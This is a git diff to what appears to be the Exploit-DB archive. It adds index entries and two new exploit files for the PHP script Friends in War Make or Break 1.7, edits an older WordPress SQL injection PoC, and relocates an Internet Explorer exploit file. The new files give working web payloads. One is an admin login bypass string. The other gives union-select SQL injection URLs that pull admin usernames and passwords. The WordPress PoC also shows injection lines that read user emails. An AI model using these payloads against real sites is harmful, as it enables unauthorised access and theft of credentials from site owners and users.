diff --git a/files.csv b/files.csv index b4cce7821..582ab7d54 100644 --- a/files.csv +++ b/files.csv @@ -9152,6 +9152,7 @@ id,file,description,date,author,platform,type,port 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0 +42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15699,7 +15700,7 @@ id,file,description,date,author,platform,type,port 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0 -42354,platforms/windows/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,"Mohamed Hamdy",windows,remote,0 +42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 @@ -38180,3 +38181,5 @@ id,file,description,date,author,platform,type,port 42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0 +42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 +42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/10488.txt b/platforms/php/webapps/10488.txt index 582f39cc5..b35efc83a 100755 --- a/platforms/php/webapps/10488.txt +++ b/platforms/php/webapps/10488.txt @@ -130,7 +130,7 @@ and subdate(curdate(), interval 9999 9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1 and subdate(curdate(), interval 9999 -## E-DB NOTE: Try 999 days if 9999 doesn't work in your environment. +## Exploit-DB Note: Try using "999 DAY)" if 9999 doesn't work in your environment. I wrote a PoC, to get automatically the password hash of the WordPress admin account: diff --git a/platforms/php/webapps/42379.txt b/platforms/php/webapps/42379.txt new file mode 100755 index 000000000..3f9e3b053 --- /dev/null +++ b/platforms/php/webapps/42379.txt @@ -0,0 +1,25 @@ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +[x] Type: Admin login bypass via SQLi + +[x] Vendor: http://software.friendsinwar.com/ + +[x] Script Name: Make or Break + +[x] Script Version: 1.7 + +[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9 + +[x] Author: Anarchy Angel + +[x] Mail: anarchy[dot]ang31@gmail[dot]com + +[x] More info: https://aahideaway.blogspot.com/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +Navigate to scripts admin login page and submit admin' or ''='-- for username + +and it should give you access to the admin area. A quick release to +kick off DefCon festivities. See you there! Enjoy >:) diff --git a/platforms/php/webapps/42381.txt b/platforms/php/webapps/42381.txt new file mode 100755 index 000000000..65e90e656 --- /dev/null +++ b/platforms/php/webapps/42381.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Friends in War Make or Break 1.7 SQL Injection +# Dork: N/A +# Date: 26.07.2017 +# Vendor : http://software.friendsinwar.com/ +# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9 +# Demo: http://localhost/[PATH]/ +# Version: 1.7 +# # # # # +# Author: Ihsan Sencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/useruploads.php?username=[SQL] +# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+- +# http://localhost/[PATH]/index.php?catid=SQL] +# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+- +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/windows/remote/42354.html b/platforms/win_x86-64/remote/42354.html similarity index 90% rename from platforms/windows/remote/42354.html rename to platforms/win_x86-64/remote/42354.html index 46595aa3d..cc0b15fb0 100755 --- a/platforms/windows/remote/42354.html +++ b/platforms/win_x86-64/remote/42354.html @@ -1,36 +1,3 @@ -# Exploit Title: Microsoft Internet Explorer - 'mshtml.dll' Remote -Code Execution (MS17-007) -# Google Dork: NA -# Date: 24/7/2017 -# Exploit Author: Mohamed Hamdy - Nsecurity -# Vendor Homepage: https://www.microsoft.com -# Version: Microsoft Internet Explorer 11 -# Tested on: Windows 7 SP1 x86 -# CVE : CVE-2017-0037 - -